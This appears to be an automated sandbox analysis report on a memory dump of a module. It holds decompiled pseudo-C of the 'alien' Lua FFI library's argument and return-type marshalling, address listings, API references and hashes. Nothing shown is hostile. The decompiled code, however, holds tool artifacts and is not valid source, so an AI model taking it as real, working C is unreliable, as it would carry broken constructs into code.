								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t273 = _t273 + 1;
						} while (_t273 <  *((intOrPtr*)(_t277 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t227 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t246, _t263, _t272, _t291,  *((intOrPtr*)(_t277 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 4)), 0, _t272);
							_push(_t275);
							L00A23F74();
							_t281 = _t280 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a2246f
0x00a2246f
0x00a2246f
0x00a2246f
0x00a2246f
0x00a2246f
0x00a22471
0x00a22476
0x00a22481
0x00a22488
0x00a2248d
0x00a22493
0x00a22495
0x00a2249a
0x00a2249d
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A22471
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: a43eb6a0c3af661745fa5bac1ab40b07bfe144601a0f6131866ef620eb1f7cb0
Instruction ID: 8065f4329b9e0ff6211db0976f638d547df36b7898cb4e8dbb6eb6c92bdc9412
Opcode Fuzzy Hash: a43eb6a0c3af661745fa5bac1ab40b07bfe144601a0f6131866ef620eb1f7cb0
Instruction Fuzzy Hash: F2B183B5D04129ABCB04EB9CFE81DEEBBB8FF49300F144528E441B7246D6399A15CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00A224A2, Relevance: 25.8, APIs: 17, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A224A2(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				intOrPtr* _t222;
				signed int _t224;
				char* _t225;
				signed int _t226;
				char* _t227;
				signed int _t238;
				void* _t245;
				void* _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				intOrPtr _t251;
				void* _t270;
				signed int _t271;
				void* _t272;
				void* _t274;
				signed int _t275;
				void* _t277;
				intOrPtr* _t278;
				void* _t279;
				long long _t289;

				L0:
				while(1) {
					L0:
					_t289 = __fp0;
					_t270 = __edi;
					_push(_t245);
					L00A23F68();
					 *((long long*)( *((intOrPtr*)(_t275 - 0x40)))) = __fp0;
					_t278 = _t277 + 8;
					E00A246A0(4);
					_t248 =  *((intOrPtr*)(_t275 - 0x40));
					_t222 = _t278;
					 *_t222 = _t248;
					 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + __edi)) = _t222;
					 *((intOrPtr*)(_t275 - 0x40)) = _t248 + 8;
					while(1) {
						L36:
						 *((intOrPtr*)(_t275 - 0xc)) =  *((intOrPtr*)(_t275 - 0xc)) + 4;
						_t245 = _t245 + 1;
						_t116 = _t275 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t275 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t250 =  *((intOrPtr*)(_t275 - 0x14));
						_t261 =  *((intOrPtr*)(_t250 + 0x30));
						_t224 =  *( *((intOrPtr*)(_t275 - 0xc)) +  *((intOrPtr*)(_t250 + 0x30)));
						if(_t224 > 0x11) {
							L33:
							_t225 =  *(_t250 + 8);
							if(_t225 == 0) {
								_t225 = "anonymous";
							}
							_push(_t225);
							_push(_t245);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t273);
							L00A23F26();
							_t278 = _t278 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t224 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t243 = E00A246A0(4);
								 *((intOrPtr*)(_t275 - 8)) = _t278;
								_push(_t245);
								_push(_t273);
								L00A23F68();
								_t278 = _t278 + 8;
								_t244 = E00A245C0(_t243, _t289);
								_t260 =  *((intOrPtr*)(_t275 - 8));
								_t261 =  *((intOrPtr*)(_t275 - 0xc));
								 *_t260 = _t244;
								 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + _t270)) = _t260;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L25:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L32:
